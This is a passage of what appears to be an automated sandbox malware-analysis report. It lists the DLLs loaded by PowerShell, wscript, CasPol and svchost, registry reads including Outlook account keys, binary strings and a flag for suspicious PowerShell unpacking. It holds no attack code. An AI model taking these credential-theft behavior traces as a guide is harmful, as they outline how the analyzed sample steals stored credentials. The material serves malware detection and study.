                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbd source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbE source: powershell.exe, 00000003.00000002.1482460145.0000000008446000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.pdb source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
